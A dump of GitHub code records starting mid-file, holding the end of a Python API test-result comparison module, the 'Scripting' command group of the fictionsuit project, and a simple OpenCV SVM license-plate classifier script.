u'response不包含messagez,code', 'data': []}\n\n else:\n result = {'code': '1002', 'message': u'state=True,请求错误', 'data': []}\n else:\n result = {'code': '1003', 'message': u'state=1,请求错误', 'data': []}\n\n else:\n result = {'code': '1004', 'message': u'response不包含state', 'data': []}\n else:\n result = {'code': '1005', 'message': u'返回包格式不合法', 'data': []}\n\n except Exception as error: # 记录到log.txt文件\n result = {'code': '9999', 'message': u'关键字参数比较异常', 'data': []}\n\n logging.basicConfig(filename=os.path.join(os.getcwd(), './syserror.Log'),\n level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n logger = logging.getLogger(__name__)\n logger.exception(error)\n return result\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n #测试\n # result_interface = '{\"message\": \"获取附近服务商成功\", \"nextPage\": 1, \"pageNo\": 0, ' \\\n # '\"merchantInfos\": \"测试环境店铺\", \"resultCode\": \"000\", \"totalPage\": 66746}'\n\n result_interface='{\"code\": 42204012, \"message\": \"您不是管理员,无权操作\", \"state\": 0}'\n\n params_interface={'table_name': 'test', 'update_time': '2017-8-21 00:52:44', 'result_interface': '',\n 'result_code_compare': 0, 'exe_mode': 'post', 'code_to_compare': 'resultCode',\n 'params_actual': None, 'case_status': 0,\n 'params_interface': '{\"latitude\": \"NULL\", \"pageNo\": 0, \"longitude\": \"123.154212\"}',\n 'result_params_compare': None, 'code_expect': '000', 'code_actual': '',\n 'create_time': None, 'exe_level': 0,\n 'url_interface': 'http://192.168.1.88:8080/personalOrder/getNearbyServiceMerchantList',\n 'header_interface': '{\"Content-Length\": \" 0\", \"UUID\": \" 862096032360278\", '\n '\"POSTFIX\": \" 9BCE6A51E0DDE0D759A55D199E691919CF3E492C9B77EA3985D6C2291B71A6274ABD93FA91EF65AC9660EC51C4D97DA1\", '\n '\"SYSTEM\": \" 5.1\", \"Host\": \" 192.168.1.88\", \"VERSION\": \" 2.6.1.161221\", '\n '\"User-Agent\": \" Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1\", '\n '\"PHONE\": \" \", \"Connection\": \" Keep-Alive\", '\n '\"CLIENT_TYPE\": \" 1\", \"APIVERSION\": \" 1.0\", \"TIME\": \" 1483597250589\", '\n '\"MODEL\": \" iPhone 5S\", \"CLIENT_FLAG\": \" 1\", \"CHANNEL\": \" Default\", '\n '\"Accept-Encoding\": \" gzip, deflate\"}', 'id': 1,\n 'params_to_compare': \"['state','message','data']\"}\n test_compare_param=Compare_param(params_interface)\n # result_compare_code=test_compare_param.Compare_code(result_interface)#关键参数值比较\n # print(result_compare_code)\n #result_get_compare_params=test_compare_param.Get_compare_params(result_interface)#获取参数集\n #print(result_get_compare_params)\n # result_compare_params_complete=test_compare_param.Compare_params_complete(result_interface)#参数完整性比较\n # print(result_compare_params_complete)\n result_get_compare_params = test_compare_param.Write_to_messageandcode(result_interface) # 错误信息写入sql\n print(result_get_compare_params)\n\n\n\n\n\n\n\n\n","repo_name":"jjwv/Auto_api","sub_path":"Auto_Api/Common/Compare_param.py","file_name":"Compare_param.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4548140401","text":"from __future__ import annotations\n\nimport gc\nimport glob\nimport ntpath\nimport os\nimport re\nimport traceback\n\nfrom .failure import CommandFailure\n\nfrom ..api_wrap.openai import ChatFactory, ChatInstance\nfrom ..core.fictionscript import (\n ExpressionMessage,\n FictionScript,\n Scope,\n ScriptLineMessage,\n)\nfrom ..core.user_message import UserMessage\nfrom .command_group import (\n CommandGroup,\n CommandHandled,\n command_split,\n slow_command,\n)\n\nCOMMA_ESCAPE = \"``COM\"\nCOMMA_ESCAPE_B = \"```COM\"\n\n\n# This file is doing way too many things\n\n\ndef escape_commas(command):\n command.escape_commas = True\n return command\n\n\ndef no_preprocessing_after(sequence: str, unless: str = None):\n def decorator(command):\n command.no_preprocessing_after = sequence\n command.unless = unless\n return command\n\n return decorator\n\n\ndef lsnap(string: str, delimiter: str):\n split = string.split(delimiter, maxsplit=1)\n if len(split) < 2:\n return (string, \"\")\n return (split[0].rstrip(), split[1].lstrip())\n\n\ndef rsnap(string: str, delimiter: str):\n split = string.rsplit(delimiter, maxsplit=1)\n if len(split) < 2:\n return (\"\", string)\n return (split[0].rstrip(), split[1].lstrip())\n\n\nclass Scripting(CommandGroup):\n def __init__(self, command_groups: list[CommandGroup]):\n self.command_groups = command_groups + [self]\n self.base = Scope() # TODO: save and load scopes?\n self.vars = self.base\n # TODO: Concurrency & scopes might be a mess\n # TODO: add a more general preprocessor outside of Scripting for parsing scripts\n # from a nicer syntax down into runnable commands\n # TODO: maybe add config options for folders instead of just hard-coding things...\n self.vars[\"fic\"] = Scope(name=\"fic\", parent=self.vars)\n self.load_scripts(\"fictionsuit/fic\", self.vars[\"fic\"])\n self.load_scripts(\"fictionsuit/.fic\", self.vars[\"fic\"])\n self.vars[\"fic\"][\"chat\"] = ChatFactory()\n\n self.evaluators = {}\n self.escape_commas = []\n\n for group in self.command_groups:\n cmds = group.get_commands()\n for cmd in cmds:\n if hasattr(cmds[cmd], \"no_preprocessing_after\"):\n self.evaluators[cmd] = (\n cmds[cmd].no_preprocessing_after,\n cmds[cmd].unless,\n )\n if hasattr(cmds[cmd], \"escape_commas\"):\n self.escape_commas.append(cmd)\n\n async def intercept_content(self, content: str) -> str | CommandFailure:\n # print(f\"Begin Interception: [{content}]\")\n # print(self.vars.inspect())\n\n (cmd, args) = command_split(content)\n\n if cmd is None:\n return content\n\n if cmd[0] == \"#\":\n return \"\" # Comment\n\n def handle_omnibar(content: str, cmd: str, args: str) -> str:\n # print(f\"Handle Omnibar: [{content}]\")\n # print(f\"cmd: [{cmd}]\")\n # print(f\"args: [{args}]\")\n n = 1\n if cmd is None:\n return content\n if cmd[0] not in \"|?\":\n return content\n if \"=\" in content:\n if \">\" not in content[: content.index(\"=\")]:\n expansion = \"var\"\n else:\n expansion = \"insert\"\n else:\n content = content.strip()\n if content == f\"|\":\n expansion = \"where\"\n elif content == f\"?\":\n expansion = \"inspect where\"\n elif content == f\"??\":\n n = 2\n expansion = \"dump where\"\n else:\n if content.endswith(\"??\"):\n expansion = \"dump retrieve\"\n cmd = cmd[1:] + args\n cmd = cmd[:-2].rstrip()\n args = \"\"\n n = 0\n elif content.endswith(\"?\"):\n expansion = \"inspect retrieve\"\n cmd = cmd[1:] + args\n cmd = cmd[:-1].rstrip()\n args = \"\"\n n = 0\n else:\n expansion = \"retrieve\"\n x = \" \".join([expansion, cmd[n:], args])\n # print(f\"Omnibar expansion: [{x}]\")\n return x\n\n content = handle_omnibar(content, cmd, args)\n\n (cmd, args) = command_split(content)\n\n unchanged = \"\"\n\n if cmd == \"...\":\n content = f\"silently {content[3:]}\"\n\n if cmd in self.evaluators:\n after = self.evaluators[cmd][0]\n unless = self.evaluators[cmd][1]\n if after == \"\":\n split = [\"\", content]\n else:\n split = None\n try:\n unless_index = content.index(unless)\n except:\n unless_index = -1\n if unless_index != -1:\n try:\n after_index = content.index(after)\n except:\n after_index = -1\n if unless_index < after_index:\n split = [content]\n if split is None:\n split = content.split(after, maxsplit=1)\n if len(split) > 1:\n unchanged = f\"{after} {split[1].lstrip()}\".lstrip()\n content = split[0].rstrip()\n\n content = content.replace(\"\\\\n\", \"\\n\")\n\n if cmd in self.escape_commas:\n content = content.replace(\"\\\\,\", COMMA_ESCAPE)\n content = content.replace(\",\", COMMA_ESCAPE_B)\n try:\n content = content.format(**self.vars.get_vars())\n except KeyError as k:\n return CommandFailure(f\"No such variable: {k}\")\n if cmd in self.escape_commas:\n content = content.replace(\",\", COMMA_ESCAPE)\n content = content.replace(COMMA_ESCAPE_B, \",\")\n\n content = f\"{content} {unchanged}\".strip()\n\n # print(f\"End Interception: [{content}]\")\n return content\n\n def load_scripts(self, directory_name, scope: Scope):\n for file in glob.glob(os.path.join(directory_name, \"*.fic\")):\n var_name = ntpath.basename(file)\n script = FictionScript.from_file(file, var_name)\n if var_name.endswith(\".fic\"):\n var_name = var_name[:-4].replace(\"_\", \" \").lower()\n scope[var_name] = script\n\n @slow_command\n async def cmd__preprocess(self, message: UserMessage, args: str) -> str:\n \"\"\"Internal metacommand for debugging.\n Usage:\n `preprocess {text}` runs pre-processing to fill in variables and escape certain characters\n \"\"\"\n return await self.intercept_content(args)\n\n async def cmd_drop(self, message: UserMessage, args: str):\n \"\"\"Drop a variable from the current scope.\"\"\"\n try:\n del self.vars.vars[args]\n except KeyError:\n return CommandFailure(f\"No such variable: {args}\")\n\n @no_preprocessing_after(\":\")\n @slow_command\n async def cmd_for(self, message: UserMessage, args: str):\n \"\"\"Iterate over a scope's contents.\n Usage:\n `for {variable} : {scope} \\n {command}`\n \"\"\"\n (loop_variable, args) = lsnap(args, \":\")\n if loop_variable == \"\" or args == \"\":\n return CommandFailure(\"Usage: `for {variable} : {scope} \\n {command}`\")\n (source_scope, command) = lsnap(args, \"\\n\")\n if source_scope == \"\" or command == \"\":\n return CommandFailure(\"Usage: `for {variable} : {scope} \\n {command}`\")\n\n source_scope = await self._evaluate(\n message, source_scope, \"for loop source scope\"\n )\n\n if isinstance(source_scope, CommandFailure):\n return CommandFailure(\n f\"Failed evaluating source_scope of for loop.\\n{source_scope}\"\n )\n\n if not isinstance(source_scope, Scope):\n return CommandFailure(f\"Expected a scope, got `{source_scope}`\")\n\n execution_scope = Scope(\n parent=source_scope, name=f\"for {loop_variable} execution context\"\n )\n execution_scope[\"results\"] = Scope(\n parent=execution_scope, name=f\"for {loop_variable}\"\n )\n\n script = None\n if \"\\n\" in command:\n script = FictionScript(command.split(\"\\n\"), name=\"_temp_for\")\n\n for variable_name in source_scope.vars:\n execution_scope[loop_variable] = source_scope[variable_name]\n execution_scope[\"name\"] = variable_name\n if script is None:\n result = await self._evaluate(\n message, command, \"for loop command\", execution_scope\n )\n else:\n result = await self._fic(message, \"\", script, execution_scope)\n if isinstance(result, CommandFailure):\n return CommandFailure(f\"Failed evaluating for loop command.\\n{result}\")\n\n return execution_scope[\"results\"]\n\n async def cmd_where(self, message: UserMessage, args: str) -> str:\n \"\"\"Internal metacommand for debugging.\n Returns the name of the current scope.\n Usage:\n `|`\"\"\"\n return self.vars\n\n async def cmd_scope(self, message: UserMessage, args: str) -> Scope:\n if args != \"\":\n self.vars[args] = Scope(parent=self.vars, name=args)\n return\n return Scope(parent=self.vars)\n\n async def cmd_into(self, message: UserMessage, args: str) -> Scope:\n \"\"\"Enters a scope.\n Usage:\n `into {scope}`\"\"\"\n vars = self.vars.get_vars()\n if args not in self.vars:\n return CommandFailure(f\"No such variable: `{args}`\")\n target = vars[args]\n if not isinstance(target, Scope):\n return CommandFailure(f\"Variable `{args}` is not a scope.\")\n self.vars = target\n\n async def cmd_out(self, message: UserMessage, args: str) -> None | CommandFailure:\n \"\"\"Exits the current scope, moving to its parent scope.\n Usage:\n `out`\"\"\"\n if self.vars.parent is None:\n return CommandFailure(\"Cannot exit scope, as there is no parent scope.\")\n self._return_to_scope(self.vars.parent)\n\n async def cmd_base(self, message: UserMessage, args: str) -> None:\n \"\"\"Returns to the base scope.\n Usage:\n `base`\"\"\"\n self._return_to_scope(self.base)\n\n async def cmd_outer(self, message: UserMessage, args: str):\n \"\"\"Returns the value of a variable from the parent scope.\"\"\"\n if args == \"\":\n if self.vars.parent is None:\n return CommandFailure(\n \"There is no outer scope -- this is the base scope.\"\n )\n return self.vars.parent\n return self.vars.parent[args]\n\n @no_preprocessing_after(\"\")\n async def cmd_inspect(self, message: UserMessage, args: str):\n result = await self._evaluate(message, args, \"inspection\")\n if hasattr(result, \"sm_inspect\"):\n try:\n return await result.sm_inspect(\"\")\n except Exception as ex:\n return CommandFailure(\n f\"Inspection failed: {ex}\\n{traceback.format_exc()}\"\n )\n if isinstance(result, str):\n return f'str(\"{result}\")'\n return CommandFailure(f\"Cannot inspect {result}\")\n\n @no_preprocessing_after(\"\")\n async def cmd_dump(self, message: UserMessage, args: str):\n result = await self._evaluate(message, args, \"dump\")\n if hasattr(result, \"sm_dump\"):\n try:\n return await result.sm_dump(\"\")\n except Exception as ex:\n return CommandFailure(f\"Dump failed: {ex}\\n{traceback.format_exc()}\")\n if isinstance(result, str):\n return f'str(\"{result}\")'\n return CommandFailure(f\"Cannot dump {result}\")\n\n thenfinder = re.compile(\"\\s+then\\s+\")\n elsefinder = re.compile(\"\\s+else\\s+\")\n\n @no_preprocessing_after(\"\")\n @slow_command\n async def cmd_if(self, message: UserMessage, args: str):\n \"\"\"if {condition} then {y} (optional:) else {z}\"\"\"\n cond_then_split = [\n x.strip() for x in Scripting.thenfinder.split(args, maxsplit=1)\n ]\n if len(cond_then_split) < 2:\n return CommandFailure(\"An `if` needs a `then`.\")\n cond = cond_then_split[0]\n then_else_split = [\n x.strip()\n for x in Scripting.elsefinder.split(cond_then_split[1], maxsplit=1)\n ]\n then = then_else_split[0]\n if len(then_else_split) < 2:\n _else = None\n else:\n _else = then_else_split[1]\n\n cond_result = await self._evaluate(message, cond, \"if condition\")\n\n if isinstance(cond_result, CommandFailure):\n return CommandFailure(f\"Failed while evaluating condition:\\n{cond_result}\")\n\n if not isinstance(cond_result, bool):\n return CommandFailure(\n f\"If condition should be a bool, but was `{cond_result}`.\"\n )\n\n if cond_result:\n block = then\n clause = \"then\"\n elif _else is not None:\n block = _else\n clause = \"else\"\n else:\n return\n\n script = None\n if \"\\n\" in block:\n script = FictionScript(block.split(\"\\n\"), name=f\"_temp_if_{clause}\")\n\n scope = Scope(parent=self.vars, name=f\"_temp_if_{clause}\")\n\n if script is not None:\n return await self._fic(message, \"\", script, scope)\n else:\n return await self._evaluate(message, block, f\"{clause} clause\", scope)\n\n @no_preprocessing_after(\"\")\n @slow_command\n async def cmd_while(self, message: UserMessage, args: str):\n \"\"\"while {condition} \\n {body}\"\"\"\n cond_do_split = [x.strip() for x in args.split(\"\\n\", maxsplit=1)]\n if len(cond_do_split) < 2:\n return CommandFailure(\"A while loop needs a body.\")\n cond = cond_do_split[0]\n body = cond_do_split[1]\n\n while True:\n cond_result = await self._evaluate(message, cond, \"while condition\")\n\n if isinstance(cond_result, CommandFailure):\n return CommandFailure(\n f\"Failed while evaluating condition:\\n{cond_result}\"\n )\n\n if not isinstance(cond_result, bool):\n return CommandFailure(\n f\"While condition should be a bool, but was `{cond_result}`.\"\n )\n\n if not cond_result:\n return\n\n result = await self._evaluate(message, body, \"body of while loop\")\n if isinstance(result, CommandFailure):\n return CommandFailure(f\"Failed in body of while loop:\\n{result}\")\n\n async def cmd_fail(self, message: UserMessage, args: str):\n if args == \"\":\n args = \"No explanation.\"\n return CommandFailure(args)\n\n @no_preprocessing_after(\"\")\n async def cmd_silently(self, message: UserMessage, args: str):\n \"\"\"Attempt to evaluate a command. Returns nothing, even if the command fails.\"\"\"\n await self._evaluate(message, args, \"silenced evaluation\")\n\n async def cmd_retrieve(self, message: UserMessage, args: str):\n \"\"\"Retrieve a value from within a scope, or from scopes within scopes.\n You can just write | as a stand-in for this command.\"\"\"\n index = None\n index_split = [x.strip() for x in args.split(\"@\", maxsplit=1)]\n if len(index_split) == 2:\n try:\n index = int(index_split[0])\n args = index_split[1]\n except ValueError:\n pass # Not an index.\n\n scope = self.vars\n while len(args) > 0 and args[0] == \"|\" and scope.parent is not None:\n args = args[1:].lstrip()\n scope = scope.parent\n\n split = [x.strip() for x in args.split(\">\") if x != \"\"]\n\n result = scope\n for name in split:\n if name in result:\n result = result[name]\n else:\n return CommandFailure(f'\"{name}\" not found.')\n\n if index is not None:\n try:\n return result[index]\n except TypeError as err:\n return CommandFailure(f'Cannot index into \"{result}\":\\n{err}')\n except IndexError as err:\n return CommandFailure(f\"Failed to access index {index}:\\n{err}\")\n\n return result\n\n @no_preprocessing_after(\"\")\n async def cmd_not(self, message: UserMessage, args: str):\n \"\"\"Evaluate an expression, and return its negation.\n Returns a CommandFailure if the expression does not return a boolean.\"\"\"\n result = await self._evaluate(message, args, \"negation\")\n if isinstance(result, CommandFailure):\n return CommandFailure(f\"Failed while evaluating expression:\\n{result}\")\n if not isinstance(result, bool):\n return CommandFailure(\n f'Cannot negate \"{result}\", because it is not a boolean.'\n )\n return not result\n\n @no_preprocessing_after(\"=\", unless=\":=\")\n async def cmd_insert(self, message: UserMessage, args: str):\n \"\"\"Assign a value from within a scope, or from scopes within scopes.\n You can just write | as a stand-in for this command.\"\"\"\n echo = False\n if \":=\" in args:\n split = [x.strip() for x in args.split(\":=\", maxsplit=1)]\n echo = True\n else:\n split = [x.strip() for x in args.split(\"=\", maxsplit=1)]\n\n retrieval = split[0]\n if len(split) < 2:\n return CommandFailure(\"No expression to insert.\")\n insertion = split[1]\n\n scope = self.vars\n while len(retrieval) > 0 and retrieval[0] == \"|\" and scope.parent is not None:\n retrieval = retrieval[1:].lstrip()\n scope = scope.parent\n\n retrieval_split = [x.strip() for x in retrieval.split(\">\")]\n if len(retrieval_split) == 1:\n if retrieval_split[0] == \"\":\n return CommandFailure(\"No insert destination.\")\n\n for name in retrieval_split[:-1]:\n if name in scope:\n scope = scope[name]\n else:\n return CommandFailure(f'\"{name}\" not found.')\n\n original_scope = self.vars\n self.vars = scope\n try:\n if echo:\n result = await self.cmd_var(\n message, f\"{retrieval_split[-1]} := {insertion}\"\n )\n else:\n result = await self.cmd_var(\n message, f\"{retrieval_split[-1]} = {insertion}\"\n )\n return result\n finally:\n self._return_to_scope(original_scope)\n\n def _return_to_scope(self, scope: Scope) -> None:\n self.vars = scope\n # gc.collect()\n\n @no_preprocessing_after(\"\")\n async def cmd_fails(self, message: UserMessage, args: str):\n result = await self._evaluate(message, args, \"failure check\")\n return isinstance(result, CommandFailure)\n\n @no_preprocessing_after(\"=\", unless=\":=\")\n @slow_command\n async def cmd_arg(self, message: UserMessage, args: str) -> None | CommandFailure:\n \"\"\"Returns a failure if the variable has not been defined.\n Alternatively, you can provide a default value.\n Arguments with no default values cannot follow an argument with a default value.\n Does nothing otherwise.\n If used within a ficscript document, this defines a required input for the script.\n Usage:\n `arg {name of argument}`\n `arg {name of argument} = {default value}`\"\"\"\n defaulting = \"=\" in args\n if defaulting:\n self.vars._has_defaulting_args = True\n if not defaulting and self.vars._has_defaulting_args:\n return CommandFailure(\n \"Arguments without defaults must precede arguments with defaults.\"\n )\n if args.startswith(\":\"):\n args = args[1:]\n echo = \":=\" in args\n if echo:\n arg_name = args.split(\":=\", maxsplit=1)[0].strip()\n else:\n arg_name = args.split(\"=\", maxsplit=1)[0].strip()\n if arg_name not in self.vars:\n if not defaulting:\n return CommandFailure(f\"Missing argument: {arg_name}\")\n return await self.cmd_var(message, args)\n\n async def cmd_args(self, message: UserMessage, args: str) -> None | CommandFailure:\n \"\"\"Returns a failure if any of the arguments have not been defined.\n Does nothing otherwise.\n This is typically used at the start of a script file, to ensure that every script input is defined.\n Names of arguments cannot contain commas, since commas are the separator.\n Usage:\n `args {name of argument}, {name of another argument}, {and another}, {and so on any number of times...} ...`\n \"\"\"\n if self.vars._has_defaulting_args:\n return CommandFailure(\n \"Arguments without defaults must precede arguments with defaults.\"\n )\n args_split = [arg.strip() for arg in args.split(\",\")]\n for arg in args_split:\n if arg.startswith(\":\"):\n arg = arg[1:]\n if arg not in self.vars:\n return CommandFailure(f\"Missing argument: {args}\")\n\n @slow_command\n async def cmd_load_fic(self, message: UserMessage, args: str) -> str:\n \"\"\"Load a fictionscript from a file. Files typically use the .fic extension. When this is the case, the\n name of the variable referring to the script will be the filename before the .fic extension, with\n underscores replaced by spaces, in all lower case.\n Usage:\n `load_fic fic/compose_poem.fic` by default, this will load the script as \"compose poem\"\n `load_fic fic/query.fic as {custom name}`\"\"\"\n if \"$FIC\" in args:\n used_shorthand = True\n args = args.replace(\"$FIC\", \"./fictionsuit/fic\")\n if \"$.FIC\" in args:\n used_shorthand = True\n args = args.replace(\"$.FIC\", \"./fictionsuit/.fic\")\n\n split = [x.strip() for x in args.split(\" as \", maxsplit=1)]\n if len(split) == 1:\n var_name = ntpath.basename(args)\n if var_name.endswith(\".fic\"):\n var_name = var_name[:-4].replace(\"_\", \" \").lower()\n else:\n var_name = split[1]\n\n try:\n script = FictionScript.from_file(split[0], var_name)\n except FileNotFoundError:\n if used_shorthand:\n return CommandFailure(\n f\"File `{split[0]}` not found. Maybe you mixed up `$FIC` and `$.FIC`?\"\n )\n return CommandFailure(f\"File `{split[0]}` not found.\")\n\n self.vars[var_name] = script\n\n return var_name\n\n @no_preprocessing_after(\"\\n\")\n @slow_command\n async def cmd_def_fic(self, message: UserMessage, args: str) -> str:\n \"\"\"Define a fictionscript. You should probably look at some examples in the `fic/` folder, and\n familiarize yourself with the documentation of the commands from the `Scripting` command group.\n Usage:\n `def_fic {name}\\\\n{script}`\"\"\"\n split = [x.strip() for x in args.split(\"\\n\")]\n var_name = split[0]\n if len(split) < 2:\n return CommandFailure(\"Script definition is empty.\")\n return FictionScript(split[1:], name=var_name)\n\n async def _fic(\n self,\n message: UserMessage,\n args: str,\n script: FictionScript,\n scope: Scope | None = None,\n ) -> CommandFailure:\n \"\"\"See docs for cmd_fic\"\"\"\n split = args.split(\":\", maxsplit=1)\n if len(split) > 1:\n arg_values = [\n x.strip().replace(COMMA_ESCAPE, \",\") for x in split[1].split(\",\")\n ]\n arg_values = [x for x in arg_values if x != \"\"]\n else:\n arg_values = []\n params = script.args\n script_name = script.name\n\n previous_dis_int_value = message.disable_interactions\n message.disable_interactions = True\n\n initial_scope = self.vars\n if scope is not None:\n self.vars = scope\n else:\n self.vars = Scope(name=f\"{script.name} execution\", parent=self.vars)\n\n async def enqueue(script_message):\n return await self.system.enqueue_message(\n script_message, return_failures=True, return_returns=True\n )\n\n if len(arg_values) > len(params):\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return CommandFailure(\n f\"Too many arguments! Remember to escape your commas.\\n\\nExtra arguments:\\n{arg_values[len(params):]}\"\n )\n\n for i in range(len(arg_values)):\n echo = False\n arg_value = arg_values[i]\n param = params[i]\n if param.startswith(\":\"):\n param = param[1:]\n echo = True\n if arg_value.startswith(\":\"):\n arg_value = arg_value[1:]\n echo = True\n assignment_op = \":=\" if echo else \"=\"\n result = await enqueue(\n ScriptLineMessage(\n f\"var {param} {assignment_op} {arg_value}\", script_name, message\n )\n )\n if result is not None:\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return CommandFailure(f\"Failed to set argument:\\n{result}\")\n\n message_lines = []\n collecting = False\n for index, line in enumerate(script.lines):\n line = line.rstrip()\n if line == \"\":\n continue\n if line.startswith(\"#\"):\n # print(f\"{index+1: >3} {line[1:].lstrip()}\")\n continue\n if line.endswith(\"--\"):\n if not collecting:\n if line[-3] == \"-\":\n message_lines.append(line[:-3].rstrip())\n collecting = True\n continue\n message_lines.append(line[:-2].rstrip())\n continue\n line = line[:-2].rstrip()\n collecting = False\n else:\n if collecting:\n message_lines.append(line)\n continue\n message_lines.append(line)\n message = ScriptLineMessage(\"\\n\".join(message_lines), script_name, message)\n result = await enqueue(message)\n message_lines = []\n if isinstance(result, CommandFailure):\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return CommandFailure(\n f\"Script `{script_name}` failed at line {index + 1}:\\n{result}\"\n )\n if result is not None:\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return result\n\n self._return_to_scope(initial_scope)\n\n message.disable_interactions = previous_dis_int_value\n\n @escape_commas\n @slow_command\n async def cmd_fic(self, message: UserMessage, args: str) -> CommandFailure:\n \"\"\"Run a fictionscript. Scripts must first be loaded from a file with `load_fic` or defined with `def_fic`.\n If the script has only one returned variable, this command will return its value.\n Usage:\n `fic {name of script}`\"\"\"\n scope_before = self.vars\n disabled_before = message.disable_interactions\n try:\n split = args.split(\":\", maxsplit=1)\n script_name = split[0].strip()\n if len(split) > 1:\n arg_values = [\n x.strip().replace(COMMA_ESCAPE, \",\") for x in split[1].split(\",\")\n ]\n arg_values = [x for x in arg_values if x != \"\"]\n else:\n arg_values = []\n\n if script_name in self.vars:\n script = self.vars[script_name]\n elif script_name in self.vars[\"fic\"]:\n script = self.vars[\"fic\"][script_name]\n elif os.path.exists(script_name):\n script_name = await self.cmd_load_fic(message, script_name)\n script = self.vars[script_name]\n else:\n if \":\" not in args:\n return CommandFailure(\n \"No such script.\\nMaybe you forgot to put a colon (:) after the script name?\"\n )\n return CommandFailure(\"No such script.\")\n\n if not isinstance(script, FictionScript):\n return CommandFailure(f\"{script_name} is not a script.\")\n return await self._fic(message, args, script)\n finally:\n self._return_to_scope(scope_before)\n message.disable_interactions = disabled_before\n\n async def cmd_pack(self, message: UserMessage, args: str):\n \"\"\"Pack several variables into a scope, and return it.\"\"\"\n vars = [x.strip() for x in args.split(\",\")]\n scope = Scope(parent=self.vars, name=\"pack\")\n\n for var in vars:\n if var in self.vars:\n scope[var] = self.vars[var]\n if isinstance(scope[var], Scope):\n scope[var].parent = scope\n else:\n return CommandFailure(f'No variable \"{var}\" in scope.')\n return scope\n\n @no_preprocessing_after(\"\")\n async def cmd_return(self, message: UserMessage, args: str):\n \"\"\"Evaluate and return an expression.\"\"\"\n return await self._evaluate(message, args, \"return\")\n\n async def _evaluate(\n self,\n message: UserMessage,\n expression: str,\n context: str,\n scope: Scope | None = None,\n ):\n previous_dis_int_value = message.disable_interactions\n message.disable_interactions = True\n initial_scope = self.vars\n if scope is not None:\n self.vars = scope\n expression_message = ExpressionMessage(expression, context, message)\n result = await self.system.enqueue_message(\n expression_message, return_whatever=True\n )\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return result\n\n @no_preprocessing_after(\"=\", unless=\":=\")\n @slow_command\n async def cmd_var(self, message: UserMessage, args: str):\n \"\"\"Attempts to store the result of another command as a variable.\n Usage:\n `var {name of variable} = {command and its arguments}`\"\"\"\n\n echo = \":=\" in args\n if echo:\n arg_split = [x.strip() for x in args.split(\":=\", maxsplit=1)]\n else:\n arg_split = [x.strip() for x in args.split(\"=\", maxsplit=1)]\n\n arg_split = [x for x in arg_split if x != \"\"]\n\n if len(arg_split) != 2:\n return CommandFailure(\"Failed to store variable: Invalid syntax.\")\n\n scope = self.vars\n\n var_name = arg_split[0]\n while len(var_name) > 0 and var_name[0] == \"|\" and scope.parent is not None:\n var_name = var_name[1:].lstrip()\n scope = scope.parent\n\n if echo:\n scope[var_name] = arg_split[1]\n return\n\n result = await self._evaluate(message, arg_split[1], \"var\")\n\n if isinstance(result, CommandFailure):\n return CommandFailure(f'Expression after \"=\" failed:\\n{result}')\n\n if result is None:\n return CommandFailure(f'Expression after \"=\" returned no value.')\n\n scope[var_name] = result\n\n if isinstance(result, Scope):\n result.recontextualize(var_name, scope)\n\n if isinstance(result, ChatInstance):\n result.name = var_name\n","repo_name":"deepfates/fictionsuit","sub_path":"fictionsuit/commands/scripting.py","file_name":"scripting.py","file_ext":"py","file_size_in_byte":32291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74347742884","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 27 17:44:01 2018\n#SVM FOR easyPR\n#very simple SVM moudle \n#just use all pixerlvalue of each img\n@author: zhouwei\n\"\"\"\nimport numpy as np\nimport cv2 as cv\nimport os \n\n#load data \ndef LoadData(fileDir,typex):\n listfile = os.listdir(fileDir)\n \n if not os.path.exists(fileDir):\n print(\"no that file\")\n return\n traindata = []\n labeldata= []\n for i in range(len(listfile)):\n path = os.path.join(str(fileDir),str(listfile[i]))\n imgtmp = cv.imread(path,0)\n imgtmp = imgtmp.flatten()#mat 2 (1,n)\n imgtmp = np.array(list(imgtmp),dtype = np.float32)#svm data formate\n traindata.append(imgtmp)\n labeldata.append(np.int32(typex))\n\n return traindata,labeldata\nprint(\"zhouwei first SVM moudle test:)\")\nprint(\"load train data set\")\n#pos data\nfileDir = \"../resources/train/has/train\"\ntrainlist,trainlabel = LoadData(fileDir,1)\n#neg data \nfileDir =\"../resources/train/no/train\"\ntrainlist01,trainlabel01 = LoadData(fileDir,0)\n\n#train data set proc --format for SVM \ntrainlist = np.vstack((trainlist,trainlist01))#train data set\ntrainlabel.extend(trainlabel01)#train label set\n\nprint(\"load test data set\")\n#pos data\nfileDir = \"../resources/train/has/test/\"\ntestlist,testlabel = LoadData(fileDir,1)\n#neg data \nfileDir =\"../resources/train/no/test/\"\ntestlist01,testlabel01 = LoadData(fileDir,0)\n#test set format for SVM\ntestlist = np.vstack((testlist,testlist01))\ntestlabel.extend(testlabel01)\n\n#create SVM module\nsvm = cv.ml.SVM_create()\n#SVM CONGIFG \ncriteria = (cv.TERM_CRITERIA_MAX_ITER + cv.TERM_CRITERIA_EPS,1000,1E-2)\nsvm.setTermCriteria(criteria)\nsvm.setGamma(1)\nsvm.setKernel(cv.ml.SVM_LINEAR)\nsvm.setP(0.0)\nsvm.setC(1)\n\nprint(\"train SVM moudle\")\nsvm.train(np.array(trainlist),cv.ml.ROW_SAMPLE,np.array(trainlabel))\nprint(\"save moudle\")\nsvm.save(\"mySvmMoudle01.mat\")\n\nprint(\"testing ...\")\nm = np.array(testlist).shape[0]# test set size \nn = 0\nfor i in range(m):\n testmat = np.mat(testlist[i])# predic format is 1XN ,so format a mat\n p = svm.predict(testmat)#p \n #print(p)#debug for p contents\n if p[1][0][0] == testlabel[i]:\n n += 1\naccurace = n/np.float32(m)\n\nprint(\"accurace is :%f\"%(accurace))\n\n\n \n 